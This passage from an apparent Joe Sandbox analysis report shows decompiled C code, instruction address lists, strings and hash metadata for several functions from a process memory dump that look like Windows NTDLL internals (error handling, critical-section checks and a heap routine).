							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E055EA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L055C4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                        0x055b1b8f
                                                                        0x055b1b9a
                                                                        0x055b1b9c
                                                                        0x055b1b9e
                                                                        0x055b1ba3
                                                                        0x05607010
                                                                        0x05607010
                                                                        0x00000000
                                                                        0x055b1ba9
                                                                        0x055b1ba9
                                                                        0x055b1bae
                                                                        0x00000000
                                                                        0x055b1bc5
                                                                        0x055b1bca
                                                                        0x055b1bcf
                                                                        0x055b1bd0
                                                                        0x055b1bd1
                                                                        0x055b1bd2
                                                                        0x055b1bd6
                                                                        0x055b1bdc
                                                                        0x055b1be0
                                                                        0x05606ffc
                                                                        0x05607000
                                                                        0x00000000
                                                                        0x05607006
                                                                        0x05607009
                                                                        0x05607009
                                                                        0x055b1be6
                                                                        0x055b1bec
                                                                        0x055b1c0b
                                                                        0x055b1c0b
                                                                        0x055b1c0c
                                                                        0x055b1c11
                                                                        0x055b1c12
                                                                        0x055b1c15
                                                                        0x055b1c1b
                                                                        0x055b1c1f
                                                                        0x055b1c31
                                                                        0x055b1c33
                                                                        0x05607026
                                                                        0x05607026
                                                                        0x055b1c21
                                                                        0x055b1c24
                                                                        0x055b1c24
                                                                        0x055b1bee
                                                                        0x055b1bee
                                                                        0x055b1bf2
                                                                        0x055b1c3a
                                                                        0x055b1bf4
                                                                        0x055b1bf4
                                                                        0x055b1c05
                                                                        0x055b1c05
                                                                        0x055b1c09
                                                                        0x055b1c3e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055b1c09
                                                                        0x055b1bec
                                                                        0x055b1be0
                                                                        0x055b1bae
                                                                        0x055b1c2e

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: WindowsExcludedProcs
                                                                        • API String ID: 0-3583428290
                                                                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                        • Instruction ID: 5c8e1d46fcfb14c2da422c7461decf3c7bdf2b26a5870acee86e5ea8c50b5b85
                                                                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                        • Instruction Fuzzy Hash: B3210776601A29ABEB66DA55C858FAFB7AEFF80650F064425FD06CB200D670DC00C7E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055CF716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055CF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                        0x055cf71d
                                                                        0x055cf722
                                                                        0x055cf726
                                                                        0x05614770
                                                                        0x055cf765
                                                                        0x055cf769
                                                                        0x055cf769
                                                                        0x055cf732
                                                                        0x0561477a
                                                                        0x00000000
                                                                        0x0561477a
                                                                        0x055cf738
                                                                        0x055cf73a
                                                                        0x055cf73c
                                                                        0x055cf73f
                                                                        0x055cf746
                                                                        0x055cf778
                                                                        0x055cf7a9
                                                                        0x055cf7a9
                                                                        0x055cf754
                                                                        0x055cf75a
                                                                        0x055cf75d
                                                                        0x055cf75f
                                                                        0x055cf761
                                                                        0x055cf76f
                                                                        0x055cf771
                                                                        0x055cf771
                                                                        0x055cf76f
                                                                        0x055cf763
                                                                        0x00000000
                                                                        0x055cf763
                                                                        0x055cf77d
                                                                        0x055cf7a3
                                                                        0x055cf7a5
                                                                        0x00000000
                                                                        0x055cf7a5
                                                                        0x055cf77f
                                                                        0x055cf782
                                                                        0x055cf784
                                                                        0x055cf786
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055cf788
                                                                        0x055cf748
                                                                        0x055cf74d
                                                                        0x055cf78d
                                                                        0x055cf793
                                                                        0x055cf7b7
                                                                        0x055cf7bc
                                                                        0x00000000
                                                                        0x055cf7bc
                                                                        0x055cf798
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055cf79d
                                                                        0x055cf7b0
                                                                        0x00000000
                                                                        0x055cf7b0
                                                                        0x055cf79f
                                                                        0x00000000
                                                                        0x055cf74f
                                                                        0x055cf74f
                                                                        0x00000000
                                                                        0x055cf74f

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Actx
                                                                        • API String ID: 0-89312691
                                                                        • Opcode ID: a27630d4408ce269d2adebc98a941fc36fa3dd93e2934516ed8304bf979426ec
                                                                        • Instruction ID: 0fc98ae645794055c2866d187f0d78338b53db1e6d6f90180373038dc10ead4c
                                                                        • Opcode Fuzzy Hash: a27630d4408ce269d2adebc98a941fc36fa3dd93e2934516ed8304bf979426ec
                                                                        • Instruction Fuzzy Hash: 5F1190353086028FEB248F9D84907367AD7FF85724F2449AEE862DB791DA70D84083C0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05658DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E05658DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x5680d50);
				E055FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E05635720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L055FDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L055FDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E055FD130(_t34, _t39, _t40);
			}





                                                                        0x05658df1
                                                                        0x05658df1
                                                                        0x05658df1
                                                                        0x05658df1
                                                                        0x05658df1
                                                                        0x05658df1
                                                                        0x05658df3
                                                                        0x05658df8
                                                                        0x05658dfd
                                                                        0x05658e00
                                                                        0x05658e0e
                                                                        0x05658e2a
                                                                        0x05658e36
                                                                        0x05658e38
                                                                        0x05658e3c
                                                                        0x05658e46
                                                                        0x05658e46
                                                                        0x05658e36
                                                                        0x05658e50
                                                                        0x05658e56
                                                                        0x05658e59
                                                                        0x05658e5c
                                                                        0x05658e60
                                                                        0x05658e67
                                                                        0x05658e6d
                                                                        0x05658e73
                                                                        0x05658e74
                                                                        0x05658eb1
                                                                        0x05658ebd

                                                                        Strings
                                                                        • Critical error detected %lx, xrefs: 05658E21
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Critical error detected %lx
                                                                        • API String ID: 0-802127002
                                                                        • Opcode ID: f21c518f48f9c734b0979f48337128a6ee20ba9a164a78c6694c99114fb7559c
                                                                        • Instruction ID: 9d76552b3831ff3b28427f3be4e64151aa1bd5bf02d763bf9d6b7fa9c7b413d1
                                                                        • Opcode Fuzzy Hash: f21c518f48f9c734b0979f48337128a6ee20ba9a164a78c6694c99114fb7559c
                                                                        • Instruction Fuzzy Hash: 0F115B75D54348DADF25DFA48909BACBBB1BB44324F24426DD9696B791C3340602DF14
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0563FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0563FF60
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                        • API String ID: 0-1911121157
                                                                        • Opcode ID: aad10be09988c0aba6d237feeb466df9f8cebf8f2d252442aba02763309f708c
                                                                        • Instruction ID: 8ff9524f8d6303d2c0f2e0c01a38de740bc34c0690f112975ca51148861b0e0c
                                                                        • Opcode Fuzzy Hash: aad10be09988c0aba6d237feeb466df9f8cebf8f2d252442aba02763309f708c
                                                                        • Instruction Fuzzy Hash: AC11E171A50184EFCF12EF50C94AF98BBB1FF48704F148458E90A6B760C7389940DB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05675BA5 Relevance: .6, Instructions: 592COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 88%
                                                                        			E05675BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x5681178);
				E055FD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E05674C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E055ED000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E05675542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x56960e8;
								if( *0x56960e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x56960e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E055E9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E055E6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E055EF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E055EF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E055EF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E055EFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E055EFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E055EF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E055EF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
